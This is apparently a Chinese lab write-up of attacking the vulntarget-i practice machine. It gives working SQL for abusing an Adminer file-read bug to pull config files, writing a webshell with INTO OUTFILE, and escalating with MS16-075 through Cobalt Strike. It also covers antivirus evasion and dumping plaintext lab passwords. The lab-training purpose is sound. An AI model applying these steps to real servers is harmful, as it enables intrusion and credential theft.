vulntarget-i 打靶记录(上)

简介: vulntarget-i 打靶记录

github地址:


https://github.com/crow821/vulntarget


No1


1.1 信息收集


靶机80端口访问过去后显示IIS7环境界面没有任何敏感信息

拿到靶机IP地址后做个端口扫描,发现8000端口开放存在http服务访问过去是个米拓建站系统,扫了一下当前目录发现存在adminer且版本比较低,网上找了一下文章尝试复现任意文件读取漏洞


1.2 文件读取


本机mysql开启外链:

GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION;

创建用来接收文件内容的库和表:

create database adminer; create table test(text text(4096));

一开始使用绝对路径米拓cms配置文件总是报错,猜想可能更改了web默认目录尝试其他办法

浏览器访问adminer插件识别到了apache版本号,尝试利用相对路径读取vhosts文件

在phpstudy环境下vhosts文件的目录格式为"../../Extensions/中间件及版本号/conf/vhosts/0localhost_端口号.conf,拼接后的命令为:

load data local infile "../../Extensions/Apache2.4.39/conf/vhosts/0localhost_8000.conf" into table tr FIELDS TERMINATED BY '\n';

绝对路径拿到后尝试读取米拓cms数据库配置文件,命令:

load data local infile "C:\\php\\adsdrsdfv\\config\\config_db.php" into table test FIELDS TERMINATED BY '\n';

拿到数据库了后尝试getshell,一开始想的是日志getshell

但等等我尝试连接shell发现不行可能web目录不可写,想起来前面的80端口上开着iis服务尝试跨中间件写shell


1.3 跨中间件


首先了解一下Iis站点配置文件存放路径:

C:\\Windows\\System32\\inetsrv\\config\\applicationHost.config

登陆靶机adminer查看secure_file_priv参数信息

参数为空可读可写,前面用的函数为load data local infile这里在读取文件的时候会报类型不一致错,猜测iis目录为中文路径换load_file函数尝试读取

命令:

select load_file('C:/Windows/System32/inetsrv/config/applicationHost.config')

其中physicaIPath参数指向的是iis文件路径,尝试into outfile写马的时候遇到中文编码问题


1.4 中文路径


命令:select '123' into outfile 'C:/vulnIIS/俱乐部/1.txt';

这里由于浏览器为utf-8没法处理中文,使用插件将编码改为gbk即可

或者将mysql数据库字符集编码为gbk应该也可以,但我尝试指定数据库字符集却报错,命令:

select '123' into outfile 'C:/vulnIIS/俱乐部/1.txt';

尝试访问

传了常规一句话连不上可能有杀软,直接写入冰蝎原生shell成功连接


1.5 内网渗透


先看一下IP信息存在双网卡做一下落地机信息收集systeminfo信息显示存在安全狗杀软,做个简单免杀传上去准备上线,顺便做了一下辅助提权发现ms16-075可用于后续提权:

上线CS后使用插件内的ms16-075攻击载荷提升至system权限,本想net user一下当前用户,结果给拦截了做了一下argue 进程参数欺骗就可以看到当前存在三个用户

尝试抓取用户明文密码

获取到的密码凭据有:admininstrator/Qwe123asd vulntarget/123.com

查看普通用户桌面的时候发现安装的有搜狗浏览器,CS利用插件获取浏览器缓存只读到了用户名密码读取失败可能是安全策略起作用了,尝试3389连上去查看

相关文章
|
JavaScript 前端开发
HTML VSCode 自用插件列表 (包含Vue)
HTML VSCode 自用插件列表 (包含Vue)
358 0
|
SQL 监控 druid
Druid未授权访问 漏洞复现
Druid未授权访问 漏洞复现
16053 0
|
6月前
|
人工智能 搜索推荐 物联网
线上共学 | Mac本地玩转大模型
本文介绍如何在Mac本地部署和使用大模型,包括基础运行、多模态扩展、交互优化、知识增强、定制进化等技术链路,并提供Ollama、Stable Diffusion、LM-Studio等工具的详细操作指南。
1066 8
|
Web App开发 移动开发 安全
WordPress插件wp-file-manager任意文件上传漏洞(CVE-2020-25213)
WordPress插件WPFileManager中存在一个严重的安全漏洞,攻击者可以在安装了此插件的任何WordPress网站上任意上传文件并远程代码执行。
1866 1
|
SQL 数据库
BUUCTF sqltest 1
BUUCTF sqltest 1
612 0
|
安全 小程序 Windows
[笔记]攻防工具分享之 CobaltStrike框架 《二》生成后门
[笔记]攻防工具分享之 CobaltStrike框架 《二》生成后门
311 0
|
安全 Shell Linux
记录VulnHub 靶场——Escalate_Linux渗透测试过程
本文档描述了一次靶场环境的搭建和渗透测试过程。首先,提供了靶机环境的下载链接,并建议在VMware或VirtualBox中以NAT模式或仅主机模式导入。接着,通过Kali Linux扫描发现靶机IP,并用Nmap扫描开放端口,识别出80、111、139、445、2049等端口。在80端口上找到一个shell.php文件,通过它发现可以利用GET参数传递cmd命令。
593 0
|
安全 算法 应用服务中间件
SSL/TLS协议信息泄露漏洞(CVE-2016-2183)【原理扫描】
SSL/TLS协议信息泄露漏洞(CVE-2016-2183)【原理扫描】 【可验证】 详细描述TLS是安全传输层协议,用于在两个通信应用程序之间提供保密性和数据完整性。
8123 2
|
SQL Web App开发 安全
【永久开源】vulntarget-c 打靶记录(下)
【永久开源】vulntarget-c 打靶记录
340 0
|
安全 关系型数据库 MySQL
PHPInfo()信息泄漏——综合利用提权
PHPInfo()信息泄漏——综合利用提权
1715 0
PHPInfo()信息泄漏——综合利用提权